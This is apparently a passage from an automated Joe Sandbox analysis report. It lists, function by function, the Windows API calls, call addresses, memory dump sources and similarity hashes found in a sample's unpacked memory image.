                                    • Opcode Fuzzy Hash: 4d46f61cf222d396080309530af9bd154fa16871d1944639c1fbf87f62c11e7f
                                    • Instruction Fuzzy Hash: 8A81CFB0945245CFDB14CF68C8415ADBBF0AF09326BA4435ED8B6AF3D1D7349846CB52
                                    APIs
                                    • __swprintf.LIBCMT ref: 001767FD
                                    • __swprintf.LIBCMT ref: 0017680A
                                      • Part of subcall function 0015172B: __woutput_l.LIBCMT ref: 00151784
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00176834
                                    • LoadResource.KERNEL32(?,00000000), ref: 00176840
                                    • LockResource.KERNEL32(00000000), ref: 0017684D
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0017686D
                                    • LoadResource.KERNEL32(?,00000000), ref: 0017687F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 0017688E
                                    • LockResource.KERNEL32(?), ref: 0017689A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001768F9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: 6f1fa0534eeb4502e2e1074d9dec0600e1fc4c3591614da7b3fc976bd5f22198
                                    • Instruction ID: c9d289226f8041742e13148807c442cbb07d987e2d3d0df1e0db33bf4d93f1fa
                                    • Opcode Fuzzy Hash: 6f1fa0534eeb4502e2e1074d9dec0600e1fc4c3591614da7b3fc976bd5f22198
                                    • Instruction Fuzzy Hash: AE31BE71A0065AAFDB159FA1ED48EBF7BB8EF08341F008525F916E6140E730D991DBB1
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 00174047
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001730A5,?,00000001), ref: 0017405B
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00174062
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001730A5,?,00000001), ref: 00174071
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00174083
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001730A5,?,00000001), ref: 0017409C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001730A5,?,00000001), ref: 001740AE
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001730A5,?,00000001), ref: 001740F3
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001730A5,?,00000001), ref: 00174108
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001730A5,?,00000001), ref: 00174113
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: bf97cb3ccaf85916d26fa33ec5b7d91ff244d2b5b4fcc35970f965fc77cbc8b3
                                    • Instruction ID: b3195d45fb6b50a83bace168318cdc4066de75d497a8dd2305d36db6a02aea1e
                                    • Opcode Fuzzy Hash: bf97cb3ccaf85916d26fa33ec5b7d91ff244d2b5b4fcc35970f965fc77cbc8b3
                                    • Instruction Fuzzy Hash: B8319375500204AFDB14EF64EC85BB977B9BB54311F12C106F918E6690EBB4A9C0CF60
                                    APIs
                                    • EnumChildWindows.USER32(?,0016CF50), ref: 0016CE90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: 2779404608163c1899176c6261b2381a88dc531cb62409bfc6da69178442d79e
                                    • Instruction ID: 4e4c925aef6b6e57e9d0f97b317060a01e2139372bb24a9236945f50dcc826bf
                                    • Opcode Fuzzy Hash: 2779404608163c1899176c6261b2381a88dc531cb62409bfc6da69178442d79e
                                    • Instruction Fuzzy Hash: AB918130A00646ABCB18DFA0C891BFEFBB5BF14340F508529E899A7151DF716969DBE0
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001330DC
                                    • CoUninitialize.COMBASE ref: 00133181
                                    • UnregisterHotKey.USER32(?), ref: 001332A9
                                    • DestroyWindow.USER32(?), ref: 001A5079
                                    • FreeLibrary.KERNEL32(?), ref: 001A50F8
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001A5125
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: 7955a248e79c806cbb459ae033b505f691bdcbe505d7985ae9bc83fb75171ad7
                                    • Instruction ID: 5520e3ff18236cbdd799fa8808ae636800bb44d24f558c3fac265210b920fef3
                                    • Opcode Fuzzy Hash: 7955a248e79c806cbb459ae033b505f691bdcbe505d7985ae9bc83fb75171ad7
                                    • Instruction Fuzzy Hash: 86913974600202CFC709EF24C999A69F3B4FF25304F5482A9F51AA7262DB30AE56CF58
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 0014CC15
                                      • Part of subcall function 0014CCCD: GetClientRect.USER32(?,?), ref: 0014CCF6
                                      • Part of subcall function 0014CCCD: GetWindowRect.USER32(?,?), ref: 0014CD37
                                      • Part of subcall function 0014CCCD: ScreenToClient.USER32(?,?), ref: 0014CD5F
                                    • GetDC.USER32 ref: 001AD137
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001AD14A
                                    • SelectObject.GDI32(00000000,00000000), ref: 001AD158
                                    • SelectObject.GDI32(00000000,00000000), ref: 001AD16D
                                    • ReleaseDC.USER32(?,00000000), ref: 001AD175
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001AD200
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: d42508d231f7ec5fd3b887ccb675810b6530df5adedee9c900861f9f165e2d90
                                    • Instruction ID: a22d99e88b216d5bb0afff1060e1ff42fed051e22d52b6a345f303142a635bfa
                                    • Opcode Fuzzy Hash: d42508d231f7ec5fd3b887ccb675810b6530df5adedee9c900861f9f165e2d90
                                    • Instruction Fuzzy Hash: 8871F138400605DFCF25DF64E881AFA3BB1FF5A360F14426AFD569A6A6D7318881DF90
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00199B19
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00199B2D
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00199B47
                                    • _wcscat.LIBCMT ref: 00199BA2
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00199BB9
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00199BE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: -----$SysListView32
                                    • API String ID: 307300125-3975388722
                                    • Opcode ID: 9e741475bd35719b0501797ab64c7f924bc2ede6e1f24f56a3a469b876341dfb
                                    • Instruction ID: 97ae6bfc60e9d05e8486216ac5b460012e8baf64cce8f6aded9c780f17cf0ac0
                                    • Opcode Fuzzy Hash: 9e741475bd35719b0501797ab64c7f924bc2ede6e1f24f56a3a469b876341dfb
                                    • Instruction Fuzzy Hash: B0418D71900348ABDF219FA8DC85FEE77A8EB08350F10456AF949A7291D7B59D84CB60
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001845FF
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0018462B
                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0018466D
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00184682
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018468F
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001846BF
                                    • InternetCloseHandle.WININET(00000000), ref: 00184706
                                      • Part of subcall function 00185052: GetLastError.KERNEL32(?,?,001843CC,00000000,00000000,00000001), ref: 00185067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                    • String ID:
                                    • API String ID: 1241431887-3916222277
                                    • Opcode ID: 6966e3411987ab28bef6c4230e5ad77c69aa32b1bd7134ca08ee0d3629686288
                                    • Instruction ID: 63db34b31010ce8e4fb019a1e4c46874c02f1d5cb166d382aab56595926f1865
                                    • Opcode Fuzzy Hash: 6966e3411987ab28bef6c4230e5ad77c69aa32b1bd7134ca08ee0d3629686288
                                    • Instruction Fuzzy Hash: 33416DB150120ABFEB16AF50DC89FFB77ACFF09354F104126FA159A141EBB49A448BA4
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001CDC00), ref: 0018B715
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001CDC00), ref: 0018B749
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0018B8C1
                                    • SysFreeString.OLEAUT32(?), ref: 0018B8EB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 31108cd5749f4f0f443b5d4ccc8602c4ff79804ba97170ff082a73b80218035a
                                    • Instruction ID: 1c77eae97284afb4e7598c572baf8b8c5787d18dbfe1ed264ec0a8d1b4243d9c
                                    • Opcode Fuzzy Hash: 31108cd5749f4f0f443b5d4ccc8602c4ff79804ba97170ff082a73b80218035a
                                    • Instruction Fuzzy Hash: 61F11875A04209EFCB08EF94C884EAEB7B9FF49315F108559F915AB250DB31AE45CF90
                                    APIs
                                    • _memset.LIBCMT ref: 001924F5
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00192688
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001926AC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001926EC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0019270E
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0019286F
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001928A1
                                    • CloseHandle.KERNEL32(?), ref: 001928D0
                                    • CloseHandle.KERNEL32(?), ref: 00192947
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 914248cebb5d09b230acde6f1ffddb12b29e33f531936e2f9e7254b8894d1936
                                    • Instruction ID: c7f75a8dc996720bc4e3d34bf21839a0257b3c8f3a3bf506c2d2d54489ed6ed3
                                    • Opcode Fuzzy Hash: 914248cebb5d09b230acde6f1ffddb12b29e33f531936e2f9e7254b8894d1936
                                    • Instruction Fuzzy Hash: 31D1BF31604301EFCB14EF24D891A6EBBE5BF95310F14856DF8999B2A2DB31EC45CB92
                                    APIs
                                      • Part of subcall function 0014B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0014B759,?,00000000,?,?,?,?,0014B72B,00000000,?), ref: 0014BA58
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0014B72B), ref: 0014B7F6
                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0014B72B,00000000,?,?,0014B2EF,?,?), ref: 0014B88D
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 001AD8A6
                                    • DeleteObject.GDI32(00000000), ref: 001AD91C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 2402799130-0
                                    • Opcode ID: ae0fbdd45102a7ccd9049175958e6ab78cc291537b3cefa3b45eff3681339be3
                                    • Instruction ID: 159983b19f1f7758ced881f03b8dce7cfdd88ecfcc3033d854e10218d86e7b07
                                    • Opcode Fuzzy Hash: ae0fbdd45102a7ccd9049175958e6ab78cc291537b3cefa3b45eff3681339be3
                                    • Instruction Fuzzy Hash: 15618B34509A01EFDB299F15E988B36B7B5FF96326F15051DE44686EB0C7B4E8D0CB40
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0019B3F4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: a538c0be4e8e72851192620ae982683051c9c30c58fa2c9650715ea5b0a6209f
                                    • Instruction ID: 2c7999a5bbeba2b4f1f2ba7f64b13cfbafe6cf19ba44061ea7dc6fc4b0ea8b45
                                    • Opcode Fuzzy Hash: a538c0be4e8e72851192620ae982683051c9c30c58fa2c9650715ea5b0a6209f
                                    • Instruction Fuzzy Hash: E9519030608204BBEF249F28EEC9BAD3B65BB05324F654111FA19D75E2D7B1EA80DB51
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001ADB1B
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001ADB3C
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001ADB51
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001ADB6E
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001ADB95
                                    • DestroyCursor.USER32(00000000), ref: 001ADBA0
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001ADBBD
                                    • DestroyCursor.USER32(00000000), ref: 001ADBC8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 3992029641-0
                                    • Opcode ID: 8252ef03d06286b103edac8c6826fd08ec0364dad2eeab2969168fc72d747baa
                                    • Instruction ID: fe5511ce209b878aaa5b644b4b49a178a4b15da44f0352e288ebb1a04992507d
                                    • Opcode Fuzzy Hash: 8252ef03d06286b103edac8c6826fd08ec0364dad2eeab2969168fc72d747baa
                                    • Instruction Fuzzy Hash: 89518C74640608EFDB24DF64DC81FAA77B5AF19360F520628F94697AA0D7B1AD80CB50
                                    APIs
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00175FA6,?), ref: 00176ED8
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00175FA6,?), ref: 00176EF1
                                      • Part of subcall function 001772CB: GetFileAttributesW.KERNEL32(?,00176019), ref: 001772CC
                                    • lstrcmpiW.KERNEL32(?,?), ref: 001775CA
                                    • _wcscmp.LIBCMT ref: 001775E2
                                    • MoveFileW.KERNEL32(?,?), ref: 001775FB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: 61f208b6c7b88e3251e912b6d8308423cee57a20b89012d1caed9516903f08b0
                                    • Instruction ID: fc02e10f25e29d4e875046f2a19a53e05c7404e2b7f62df6219e3ee460eee08b
                                    • Opcode Fuzzy Hash: 61f208b6c7b88e3251e912b6d8308423cee57a20b89012d1caed9516903f08b0
                                    • Instruction Fuzzy Hash: 52515EB2A092199ADF55EB94D841DDE73BC9F1D310F1085EAFA09E3081EB7496C9CF60
                                    APIs
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 0014EAEB
                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 0014EB32
                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 001ADC86
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 001ADCF2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
